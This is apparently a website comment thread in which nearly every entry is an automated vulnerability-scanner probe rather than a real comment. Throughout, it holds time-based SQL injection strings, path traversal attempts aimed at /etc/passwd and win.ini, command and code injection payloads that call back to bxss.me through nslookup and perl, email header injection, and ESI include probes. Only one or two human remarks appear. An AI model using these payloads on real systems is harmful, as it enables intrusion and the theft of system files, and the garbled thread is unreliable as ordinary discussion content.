-1" OR 3+288-288-1=0+0+0+1 --
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
KRpE58oY'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 376=(SELECT 376 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 931=(SELECT 931 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 235=(SELECT 235 FROM PG_SLEEP(15))--
re: Yee How
DM7isISK' OR 968=(SELECT 968 FROM PG_SLEEP(15))--
re: Yee How
GhN7pw8O') OR 884=(SELECT 884 FROM PG_SLEEP(15))--
re: Yee How
Ncyq6u9f')) OR 428=(SELECT 428 FROM PG_SLEEP(15))--
re: Yee How
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Screenshot of error via remote debug
re: guest
jkbUJUlf
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+740-740-1=0+0+0+1
re: guest
-1 OR 3+740-740-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
HVGiAcsT'; waitfor delay '0:0:15' --
re: guest
-5 OR 151=(SELECT 151 FROM PG_SLEEP(15))--
re: guest
-5) OR 650=(SELECT 650 FROM PG_SLEEP(15))--
re: guest
-1)) OR 350=(SELECT 350 FROM PG_SLEEP(15))--
re: guest
lSvbglfr' OR 396=(SELECT 396 FROM PG_SLEEP(15))--
re: guest
q1XXtud9') OR 39=(SELECT 39 FROM PG_SLEEP(15))--
re: guest
zMHIVfih')) OR 866=(SELECT 866 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@LtluM
re: guest
1CG8mp6zHGO
re: guest
response.write(9889699*9590713)
re: guest
'+response.write(9889699*9590713)+'
re: guest
"+response.write(9889699*9590713)+"
re: guest
%0abcc:074625.67-22200.67.12435.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-22201.67.12435.19990.2@bxss.me
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
${9999491+9999097}
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
echo nzkfkm$()\ vbeqau\nz^xyu||a #' &echo nzkfkm$()\ vbeqau\nz^xyu||a #|" &echo nzkfkm$()\ vbeqau\nz^xyu||a #
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
&echo qyluox$()\ oippox\nz^xyu||a #' &echo qyluox$()\ oippox\nz^xyu||a #|" &echo qyluox$()\ oippox\nz^xyu||a #
re: guest
/etc/passwd
re: guest
|echo olfbnc$()\ tejnax\nz^xyu||a #' |echo olfbnc$()\ tejnax\nz^xyu||a #|" |echo olfbnc$()\ tejnax\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
(nslookup hititdtloexvnf6285.bxss.me||perl -e "gethostbyname('hititdtloexvnf6285.bxss.me')")
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
$(nslookup hitvzzilghjoa44446.bxss.me||perl -e "gethostbyname('hitvzzilghjoa44446.bxss.me')")
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
&nslookup hitxiaaklhbrh1d6e4.bxss.me&'\"`0&nslookup hitxiaaklhbrh1d6e4.bxss.me&`'
re: guest
)
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
&(nslookup hitzkckxvnlzrc73bd.bxss.me||perl -e "gethostbyname('hitzkckxvnlzrc73bd.bxss.me')")&'\"`0&(nslookup hitzkckxvnlzrc73bd.bxss.me||perl -e "gethostbyname('hitzkckxvnlzrc73bd.bxss.me')")&`'
re: guest
!(()&&!|*|*|
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
|(nslookup hitjuokxjoppvf87d4.bxss.me||perl -e "gethostbyname('hitjuokxjoppvf87d4.bxss.me')")
re: guest
^(#$!@#$)(()))******
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
`(nslookup hitcelockhrxwc12e5.bxss.me||perl -e "gethostbyname('hitcelockhrxwc12e5.bxss.me')")`
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
;(nslookup hitztywsctpqea2f37.bxss.me||perl -e "gethostbyname('hitztywsctpqea2f37.bxss.me')")|(nslookup hitztywsctpqea2f37.bxss.me||perl -e "gethostbyname('hitztywsctpqea2f37.bxss.me')")&(nslookup hitztywsctpqea2f37.bxss.me||perl -e "gethostbyname('hitztywsctpqea2f37.bxss.me')")
re: guest
file:///etc/passwd
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
/WEB-INF/web.xml
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
'.gethostbyname(lc('hitfl'.'qitkllaye3a35.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(89).chr(99).chr(77).'
re: guest
Http://bxss.me/t/fit.txt
re: guest
/../../../../../../../../../../boot.ini
re: guest
".gethostbyname(lc("hitsw"."uixpdomud574c.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(66).chr(97).chr(84)."
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
/etc/shells
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
c:/windows/win.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
bxss.me
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(117).concat(83).concat(98).concat(80)+(require"socket"
Socket.gethostbyname("hitqw"+"xngzhpyy244f8.bxss.me.")[3].to_s)+"
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(110).concat(74).concat(115).concat(71)+(require'socket'
Socket.gethostbyname('hitkv'+'egcgombn2e58f.bxss.me.')[3].to_s)+'
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
';print(md5(31337));$a='
re: guest
";print(md5(31337));$a="
re: guest
'"
re: guest
${@print(md5(31337))}
re: guest
<!--
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
1
re: guest
1
re: guest
-1 OR 2+293-293-1=0+0+0+1 --
re: guest
-1 OR 3+293-293-1=0+0+0+1 --
re: guest
-1 OR 2+256-256-1=0+0+0+1
re: guest
-1 OR 3+256-256-1=0+0+0+1
re: guest
-1' OR 2+850-850-1=0+0+0+1 --
re: guest
-1' OR 3+850-850-1=0+0+0+1 --
re: guest
-1' OR 2+334-334-1=0+0+0+1 or 'toJP8EzL'='
re: guest
-1' OR 3+334-334-1=0+0+0+1 or 'toJP8EzL'='
re: guest
-1" OR 2+480-480-1=0+0+0+1 --
re: guest
-1" OR 3+480-480-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
Ee7i5HLy'; waitfor delay '0:0:15' --
re: guest
-5 OR 22=(SELECT 22 FROM PG_SLEEP(15))--
re: guest
-5) OR 115=(SELECT 115 FROM PG_SLEEP(15))--
re: guest
-1)) OR 447=(SELECT 447 FROM PG_SLEEP(15))--
re: guest
EB5dhYrs' OR 936=(SELECT 936 FROM PG_SLEEP(15))--
re: guest
Wznc8YmJ') OR 420=(SELECT 420 FROM PG_SLEEP(15))--
re: guest
aW8TM3ZA')) OR 556=(SELECT 556 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
Didn't notice this until now, I like the changes! This is the the right direction, thank you Saito san!
re: guest
FuTN5R4t
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+759-759-1=0+0+0+1
re: guest
-1 OR 3+759-759-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
658rVC28'; waitfor delay '0:0:15' --
re: guest
-5 OR 843=(SELECT 843 FROM PG_SLEEP(15))--
re: guest
-5) OR 499=(SELECT 499 FROM PG_SLEEP(15))--
re: guest
-1)) OR 19=(SELECT 19 FROM PG_SLEEP(15))--
re: guest
06WLhOHu' OR 674=(SELECT 674 FROM PG_SLEEP(15))--
re: guest
dDy1ZzQA') OR 191=(SELECT 191 FROM PG_SLEEP(15))--
re: guest
jhix0AHz')) OR 62=(SELECT 62 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@i46o2
re: guest
1DblNdStzIO
re: guest
response.write(9943419*9938017)
re: guest
'+response.write(9943419*9938017)+'
re: guest
"+response.write(9943419*9938017)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
echo vpvbnf$()\ zsbgzd\nz^xyu||a #' &echo vpvbnf$()\ zsbgzd\nz^xyu||a #|" &echo vpvbnf$()\ zsbgzd\nz^xyu||a #
re: guest
/etc/passwd
re: guest
&echo ovqdqx$()\ auhgsk\nz^xyu||a #' &echo ovqdqx$()\ auhgsk\nz^xyu||a #|" &echo ovqdqx$()\ auhgsk\nz^xyu||a #
re: guest
|echo oljwwp$()\ jsoqwb\nz^xyu||a #' |echo oljwwp$()\ jsoqwb\nz^xyu||a #|" |echo oljwwp$()\ jsoqwb\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
(nslookup hitpduqkclgjgd548a.bxss.me||perl -e "gethostbyname('hitpduqkclgjgd548a.bxss.me')")
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
$(nslookup hitrgkoahndhgd88ab.bxss.me||perl -e "gethostbyname('hitrgkoahndhgd88ab.bxss.me')")
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
&nslookup hitcxduqwntqyfcae9.bxss.me&'\"`0&nslookup hitcxduqwntqyfcae9.bxss.me&`'
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
&(nslookup hitvieckugakr690c7.bxss.me||perl -e "gethostbyname('hitvieckugakr690c7.bxss.me')")&'\"`0&(nslookup hitvieckugakr690c7.bxss.me||perl -e "gethostbyname('hitvieckugakr690c7.bxss.me')")&`'
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
|(nslookup hitffcxyqvlqnea656.bxss.me||perl -e "gethostbyname('hitffcxyqvlqnea656.bxss.me')")
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
`(nslookup hitvgccarpygzd831b.bxss.me||perl -e "gethostbyname('hitvgccarpygzd831b.bxss.me')")`
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
;(nslookup hitnctquisawt4c19c.bxss.me||perl -e "gethostbyname('hitnctquisawt4c19c.bxss.me')")|(nslookup hitnctquisawt4c19c.bxss.me||perl -e "gethostbyname('hitnctquisawt4c19c.bxss.me')")&(nslookup hitnctquisawt4c19c.bxss.me||perl -e "gethostbyname('hitnctquisawt4c19c.bxss.me')")
re: guest
file:///etc/passwd
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
/WEB-INF/web.xml
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
%0abcc:074625.67-22273.67.c53de.19990.2@bxss.me
re: guest
/../../../../../../../../../../boot.ini
re: guest
to@example.com>%0d%0abcc:074625.67-22274.67.c53de.19990.2@bxss.me
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
